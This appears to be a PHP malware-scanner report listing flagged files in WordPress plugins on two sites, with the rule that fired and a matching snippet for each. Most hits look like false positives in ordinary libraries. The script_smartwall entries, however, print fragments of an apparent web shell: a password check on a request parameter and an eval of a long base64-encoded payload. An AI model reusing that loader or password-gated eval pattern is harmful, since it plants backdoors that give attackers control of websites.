${$gloabl_filter_ids_name}
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.80 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/admin/tracking/class-tracking-server-data.php Size: 1.98 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 39 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/inc/sitemaps/class-sitemaps-cache-validator.php Size: 9.33 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign d30fc49e Line: 108 Dangerous Malware Signature (hash: d30fc49e) |
backdoor
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/src/orm/yoast-orm-wrapper.php Size: 4.68 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 95 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$repositories[ $table_name ]( $table_name, [], $connection_name )
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/vendor_prefixed/guzzlehttp/guzzle/src/Handler/StreamHandler.php Size: 18.02 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 83 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$options['on_headers']($response)
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/vendor_prefixed/guzzlehttp/guzzle/src/Handler/MockHandler.php Size: 6.02 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 69 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$options['on_headers']($response)
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/vendor_prefixed/guzzlehttp/guzzle/src/HandlerStack.php Size: 7.76 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 176 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fn[0]($prev)
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/vendor_prefixed/guzzlehttp/promises/src/Promise.php Size: 8.78 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 164 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$handler[$index]($value)
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/PgSQL/Base.php Size: 44.47 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($command); } public function table_exists($tbl, $reload_tables = \false) { $this->load_tables($reload_tables); return \array_key_exists($tbl, $this->_tables); } public function execute($query) { return $this->query($query); } public function query($query) { $this->logger->log($query); $query_type = $this->determine_query_type($query); $data = array(); if ($query_type == \YoastSEO_Vendor\SQL_SELECT || $query_type == \YoastSEO_Vendor\SQL_SHOW) { $res = \pg_query($this->conn, $query); if ($t...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/Sqlite3/Base.php Size: 27.06 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($command); } public function create_database($db, $options = array()) { $this->log_unsupported_feature(__FUNCTION__); return \true; } public function execute($query) { return $this->query($query); } public function quote_string($str) { return $this->sqlite3->escapeString($str); } public function database_exists($db) { $this->log_unsupported_feature(__FUNCTION__); return \true; } public function create_table($table_name, $options = array()) { return new \YoastSEO_Vendor\Ruckusing_Adapter_S...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 25.00 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 293.20 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 6.05 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 214.28 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 11.29 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.51 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 191.05 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 826.00 B Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/redirection/models/regex.php Size: 1.85 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 45 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.94 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.77 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 84.69 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.81 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 73.99 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 22.30 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.80 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.16 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.66 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 6.07 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.98 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.52 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 7.12 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/script_smartwall/update.php Size: 9.06 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/script_smartwall/index.php Size: 38.45 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 14:02:52 Modified: 2020-07-24 20:06:34 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:34 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
